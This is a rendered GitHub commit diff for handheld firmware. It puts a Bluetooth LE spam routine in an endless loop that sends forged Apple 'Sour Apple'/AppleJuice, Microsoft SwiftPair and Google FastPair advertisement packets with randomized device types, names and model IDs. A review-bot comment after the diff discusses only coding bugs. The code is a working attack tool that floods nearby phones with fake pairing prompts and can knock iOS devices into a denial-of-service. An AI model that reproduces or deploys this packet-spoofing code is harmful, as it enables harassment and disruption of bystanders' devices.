added apple data send and loop
pr3y committed May 12, 2024
1 parent 3964867 commit a33f5ae
Showing 2 changed files with 132 additions and 157 deletions.
287 changes: 131 additions & 156 deletions src/ble_spam.cpp
Expand Up @@ -265,187 +265,162 @@ BLEAdvertising *pAdvertising;

/**********************************************************************
** Function: aj_adv
** spams BLE
** spams BLE from choice
**********************************************************************/
//TODO: add main loop to continue advertising
void aj_adv(int ble_choice){
bool rstOverride;
tft.fillScreen(TFT_BLACK);
bool rstOverride = true;
bool swiftPair;
bool androidPair;
bool sourApple;
bool maelstrom;
int advtime;

switch(ble_choice){
case 0:
data = Airpods;
sourApple = true;
displayRedStripe("Applejuice");
delay(500);
break;
case 1:
swiftPair = true;
displayRedStripe("SwiftPair");
delay(500);
break;
case 2:
androidPair = true;
displayRedStripe("AndroidPair");
delay(500);
break;
case 3:
sourApple = true;
data = AppleTVPair;
displayRedStripe("SourApple");
delay(500);
break;
case 4:
maelstrom = true;
displayRedStripe("Maelstrom");
delay(500);
break;
}
rstOverride = true;
if (sourApple || swiftPair || androidPair || maelstrom){
delay(20); // 20msec delay instead of ajDelay for SourApple attack
advtime = 0; // bypass ajDelay counter
}
if (millis() > advtime ){
advtime = millis();
pAdvertising->stop(); // This is placed here mostly for timing.
// It allows the BLE beacon to run through the loop.
BLEAdvertisementData oAdvertisementData = BLEAdvertisementData();
if (sourApple){
Serial.print("advertising");
// Some code borrowed from RapierXbox/ESP32-Sour-Apple
// Original credits for algorithm ECTO-1A & WillyJL
uint8_t packet[17];
uint8_t size = 17;
uint8_t i = 0;
packet[i++] = size - 1; // Packet Length
packet[i++] = 0xFF; // Packet Type (Manufacturer Specific)
packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
packet[i++] = 0x00; // ...
packet[i++] = 0x0F; // Type
packet[i++] = 0x05; // Length
packet[i++] = 0xC1; // Action Flags
const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 };
packet[i++] = types[rand() % sizeof(types)]; // Action Type
esp_fill_random(&packet[i], 3); // Authentication Tag
i += 3;
packet[i++] = 0x00; // ???
packet[i++] = 0x00; // ???
packet[i++] = 0x10; // Type ???
esp_fill_random(&packet[i], 3);
oAdvertisementData.addData(std::string((char *)packet, 17));
for (int i = 0; i < sizeof packet; i ++) {
Serial.printf("%02x", packet[i]);
}
Serial.println("");
} else if (swiftPair) {
const char* display_name = generateRandomName();
Serial.printf(display_name);
uint8_t display_name_len = strlen(display_name);
uint8_t size = 7 + display_name_len;
uint8_t* packet = (uint8_t*)malloc(size);
uint8_t i = 0;
packet[i++] = size - 1; // Size
packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
packet[i++] = 0x06; // Company ID (Microsoft)
packet[i++] = 0x00; // ...
packet[i++] = 0x03; // Microsoft Beacon ID
packet[i++] = 0x00; // Microsoft Beacon Sub Scenario
packet[i++] = 0x80; // Reserved RSSI Byte
for (int j = 0; j < display_name_len; j++) {
packet[i + j] = display_name[j];
}
for (int i = 0; i < size; i ++) {
Serial.printf("%02x", packet[i]);
}
Serial.println("");

i += display_name_len;
oAdvertisementData.addData(std::string((char *)packet, size));
free(packet);
free((void*)display_name);
} else if (androidPair) {
Serial.print("spamming adv");
uint8_t packet[14];
uint8_t i = 0;
packet[i++] = 3; // Packet Length
packet[i++] = 0x03; // AD Type (Service UUID List)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
packet[i++] = 6; // Size
packet[i++] = 0x16; // AD Type (Service Data)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
const uint32_t model = android_models[rand() % android_models_count].value; // Action Type
packet[i++] = (model >> 0x10) & 0xFF;
packet[i++] = (model >> 0x08) & 0xFF;
packet[i++] = (model >> 0x00) & 0xFF;
packet[i++] = 2; // Size
packet[i++] = 0x0A; // AD Type (Tx Power Level)
packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm

oAdvertisementData.addData(std::string((char *)packet, 14));
for (int i = 0; i < sizeof packet; i ++) {
Serial.printf("%02x", packet[i]);
}
Serial.println("");
} else {
Serial.print("ADV");
if (deviceType >= 18){
oAdvertisementData.addData(std::string((char*)data, sizeof(AppleTVPair)));
for(;;){
if (sourApple || swiftPair || androidPair || maelstrom){
delay(20); // 20msec delay instead of ajDelay for SourApple attack
advtime = 0; // bypass ajDelay counter
}
if (millis() > advtime ){
advtime = millis();
pAdvertising->stop(); // This is placed here mostly for timing.
// It allows the BLE beacon to run through the loop.
BLEAdvertisementData oAdvertisementData = BLEAdvertisementData();
if (sourApple){
Serial.print("advertising");
// Some code borrowed from RapierXbox/ESP32-Sour-Apple
// Original credits for algorithm ECTO-1A & WillyJL
uint8_t packet[17];
uint8_t size = 17;
uint8_t i = 0;
packet[i++] = size - 1; // Packet Length
packet[i++] = 0xFF; // Packet Type (Manufacturer Specific)
packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
packet[i++] = 0x00; // ...
packet[i++] = 0x0F; // Type
packet[i++] = 0x05; // Length
packet[i++] = 0xC1; // Action Flags
const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 };
packet[i++] = types[rand() % sizeof(types)]; // Action Type
esp_fill_random(&packet[i], 3); // Authentication Tag
i += 3;
packet[i++] = 0x00; // ???
packet[i++] = 0x00; // ???
packet[i++] = 0x10; // Type ???
esp_fill_random(&packet[i], 3);
oAdvertisementData.addData(std::string((char *)packet, 17));
for (int i = 0; i < sizeof packet; i ++) {
Serial.printf("%02x", packet[i]);
}
} else if (swiftPair) {
const char* display_name = generateRandomName();
Serial.printf(display_name);
uint8_t display_name_len = strlen(display_name);
uint8_t size = 7 + display_name_len;
uint8_t* packet = (uint8_t*)malloc(size);
uint8_t i = 0;
packet[i++] = size - 1; // Size
packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
packet[i++] = 0x06; // Company ID (Microsoft)
packet[i++] = 0x00; // ...
packet[i++] = 0x03; // Microsoft Beacon ID
packet[i++] = 0x00; // Microsoft Beacon Sub Scenario
packet[i++] = 0x80; // Reserved RSSI Byte
for (int j = 0; j < display_name_len; j++) {
packet[i + j] = display_name[j];
}
for (int i = 0; i < size; i ++) {
Serial.printf("%02x", packet[i]);
}
Serial.println("");

i += display_name_len;
oAdvertisementData.addData(std::string((char *)packet, size));
free(packet);
free((void*)display_name);
} else if (androidPair) {
Serial.print("spamming adv");
uint8_t packet[14];
uint8_t i = 0;
packet[i++] = 3; // Packet Length
packet[i++] = 0x03; // AD Type (Service UUID List)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
packet[i++] = 6; // Size
packet[i++] = 0x16; // AD Type (Service Data)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
const uint32_t model = android_models[rand() % android_models_count].value; // Action Type
packet[i++] = (model >> 0x10) & 0xFF;
packet[i++] = (model >> 0x08) & 0xFF;
packet[i++] = (model >> 0x00) & 0xFF;
packet[i++] = 2; // Size
packet[i++] = 0x0A; // AD Type (Tx Power Level)
packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm

oAdvertisementData.addData(std::string((char *)packet, 14));
for (int i = 0; i < sizeof packet; i ++) {
Serial.printf("%02x", packet[i]);
}
Serial.println("");
} else {
oAdvertisementData.addData(std::string((char*)data, sizeof(Airpods)));
Serial.print("ADV");
if (deviceType >= 18){
oAdvertisementData.addData(std::string((char*)data, sizeof(AppleTVPair)));
} else {
oAdvertisementData.addData(std::string((char*)data, sizeof(Airpods)));
}
for (int i = 0; i < sizeof(Airpods); i ++) {
Serial.printf("%02x", data[i]);
}
Serial.println("");
}
for (int i = 0; i < sizeof(Airpods); i ++) {
Serial.printf("%02x", data[i]);
}
Serial.println("");

pAdvertising->setAdvertisementData(oAdvertisementData);
pAdvertising->start();
#if defined(M5LED)
digitalWrite(M5LED, M5LED_ON); //LED ON on Stick C Plus
delay(10);
digitalWrite(M5LED, M5LED_OFF); //LED OFF on Stick C Plus
#endif
}

pAdvertising->setAdvertisementData(oAdvertisementData);
pAdvertising->start();
#if defined(M5LED)
digitalWrite(M5LED, M5LED_ON); //LED ON on Stick C Plus
delay(10);
digitalWrite(M5LED, M5LED_OFF); //LED OFF on Stick C Plus
#endif
}
if (checkSelPress()) {
if (checkSelPress()) {

sourApple = false;
swiftPair = false;
maelstrom = false;
pAdvertising->stop(); // Bug that keeps advertising in the background. Oops.
delay(250);
}
sourApple = false;
swiftPair = false;
maelstrom = false;
pAdvertising->stop(); // Bug that keeps advertising in the background. Oops.
delay(250);
}

}
}
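Review bot: The new `for(;;)` loop never exits — the `checkSelPress()` handler at its end clears the flags and calls `pAdvertising->stop()` but does not `break`, so after the press the function keeps looping in the `else` branch and re-advertises `data`, and `androidPair` is not cleared alongside `sourApple`/`swiftPair`/`maelstrom`; add `break;` after `delay(250);` and reset `androidPair` with the others. The four mode flags and `advtime` are declared at the top of `aj_adv` without initializers, and since the `switch` sets only one of them, the `if (sourApple || swiftPair || androidPair || maelstrom)` test inside the loop reads indeterminate values every iteration; declare them `bool swiftPair = false, androidPair = false, sourApple = false, maelstrom = false;` and `unsigned long advtime = 0;` (which also removes the signed `int` comparison against `millis()`). In the SwiftPair branch, `Serial.printf(display_name)` passes generated text as the format string — use `Serial.print(display_name);` instead. The SourApple hex dump inside the loop also appears to have lost the trailing `Serial.println("");` the other branches keep, though the old/new side of each line cannot be told apart on this rendered page, so please confirm against the actual diff.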








































2 changes: 1 addition & 1 deletion src/main.cpp
Expand Up @@ -188,7 +188,7 @@ void loop() {
break;
case 1: // BLE
options = {
{"AppleJuice", [=]() { aj_adv(1); }},
{"AppleJuice", [=]() { aj_adv(0); }},
{"SwiftPair", [=]() { aj_adv(1); }},
{"Android Spam", [=]() { aj_adv(2);}},
{"SourApple", [=]() { aj_adv(3); }},
